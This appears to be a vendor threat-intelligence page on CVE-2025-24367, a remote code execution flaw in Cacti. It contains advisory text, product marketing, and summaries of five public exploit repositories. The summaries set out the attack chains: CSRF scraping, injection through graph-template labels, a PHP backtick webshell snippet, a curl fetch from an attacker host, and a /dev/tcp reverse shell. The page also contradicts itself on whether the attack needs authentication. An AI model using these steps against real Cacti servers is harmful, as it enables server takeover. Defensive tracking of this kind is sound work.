CVE-2025-24367 affects Cacti versions prior to 1.2.29. According to the provided content, the flaw allows an attacker to abuse Cacti's graph creation and graph template functionality to create arbitrary PHP scripts in the application's web root. Because the attacker-controlled file is written as executable PHP within the web-accessible directory, the issue results in remote code execution on the server. The content also characterizes exploitation as occurring via Cacti's graph template mechanism and notes Metasploit support for unauthenticated exploitation.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
5 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (2 hidden).
Repository contains a single Python exploit (exploit.py) and a README describing setup and usage. The exploit targets CVE-2025-24367 in Cacti: an authenticated RCE via graph template manipulation. Workflow: (1) verify the target page contains 'Cacti'; (2) authenticate to /cacti/index.php by scraping csrfMagicToken from the landing page; (3) locate a graph template ID by searching for 'Unix - Logged in Users'; (4) start an attacker-side HTTP server on TCP/80 serving the current working directory; (5) write a local file named 'bash' containing a /dev/tcp reverse shell to attacker IP/port; (6) update the graph template’s right_axis_label with a crafted multi-line string that injects rrdtool graph arguments to create a random .php file containing PHP backticks executing a command. Stage 1 writes a PHP file that runs `curl <attacker_ip>/bash -o bash` to download the payload from the attacker HTTP server. Stage 2 writes another PHP file that runs `bash bash` to execute the downloaded script, producing a reverse shell. The exploit triggers execution by requesting /cacti/graph_json.php with fixed parameters to force graph generation, then requests the generated /cacti/<random>.php to execute the embedded command. A short timeout on the stage-2 request is treated as success (shell likely established).
Repository contains a single shell script exploit (CVE-2025-24367.sh) targeting a Cacti web application vulnerability that enables authenticated RCE via graph/RRDTool parameter injection. Structure & flow: - CVE-2025-24367.sh: Standalone PoC/operational exploit script. 1) Performs an initial GET to /index.php to extract the Cacti session cookie (Set-Cookie: Cacti=<32 chars>) and csrfMagicToken. 2) Logs in by POSTing to /index.php with action=login, username/password, and __csrf_magic, then extracts the post-login csrfMagicToken. 3) Generates a random filename via uuidgen and sends a crafted POST to /graphs.php?header=false. The right_axis_label parameter contains URL-encoded newlines and RRDTool-like directives that cause creation of a web-accessible PHP file named <uuid>.php containing a command-execution snippet (<?=`$CMD`;?>). 4) Calls /graph_json.php?local_graph_id=1 to trigger graph processing, then prints and requests the created PHP file to retrieve command output. Notable characteristics: - Requires valid credentials (authenticated exploit). - Uses curl with cookie handling and CSRF token scraping. - Obfuscates spaces in the command by replacing them with \${IFS}. - Leaves a persistent artifact on the server (the created PHP file), effectively acting as a simple webshell dropper.
This repository provides a proof-of-concept exploit for CVE-2025-24367, an authenticated remote code execution vulnerability in Cacti. The exploit consists of two files: a detailed README.md explaining the vulnerability and usage, and exploit.py, a Python script that automates the attack. The exploit requires valid Cacti credentials and network access to the target. It works by abusing the 'Unix - Logged in Users' graph template (ID 226) to inject a malicious PHP file into the Cacti web root. This PHP file, when triggered, downloads a bash reverse shell script from the attacker's HTTP server and executes it, resulting in a reverse shell connection back to the attacker. The script handles authentication, payload creation, HTTP server setup, and the two-stage exploitation process. The main endpoints targeted are various Cacti web application URLs used for login, template editing, and payload triggering. The exploit is a functional PoC and is not weaponized or stealthy.
This repository contains a Python exploit (exploit.py) targeting CVE-2025-24367, a remote code execution vulnerability in Cacti's graph template functionality. The exploit requires valid Cacti credentials and interacts with the Cacti web interface to authenticate, locate a vulnerable graph template, and inject a malicious PHP payload. The payload, when triggered, downloads a bash reverse shell script from the attacker's HTTP server and executes it, resulting in a reverse shell connection to the attacker's machine. The exploit automates the process of logging in, modifying templates, uploading the payload, and triggering its execution. The repository structure is simple, with a single exploit script and a brief README. The exploit is operational, providing a working reverse shell payload and automating all necessary steps for exploitation.
This repository contains a Python exploit (exploit.py) for CVE-2025-24367, a remote code execution vulnerability in Cacti's graph template functionality. The exploit requires valid credentials for an authenticated session on the target Cacti instance. It works by logging in, identifying a suitable graph template, and injecting a PHP payload that fetches and executes a bash reverse shell script. The exploit script also spins up a local HTTP server to serve the payload and expects the attacker to have a listener ready to catch the reverse shell. The code is operational and automates the full attack chain, including login, payload delivery, and execution. The README provides detailed usage instructions and strong warnings about legal and ethical use. The main entry point is exploit.py, which is written in Python and leverages the requests and BeautifulSoup libraries for web interaction. The exploit targets Cacti installations vulnerable to CVE-2025-24367, likely on Linux platforms.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An unauthenticated remote code execution vulnerability in Cacti (versions prior to 1.2.29) exploitable via the graph template mechanism.
An unauthenticated remote code execution vulnerability in Cacti (graph template related), affecting versions prior to 1.2.29 per the content.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.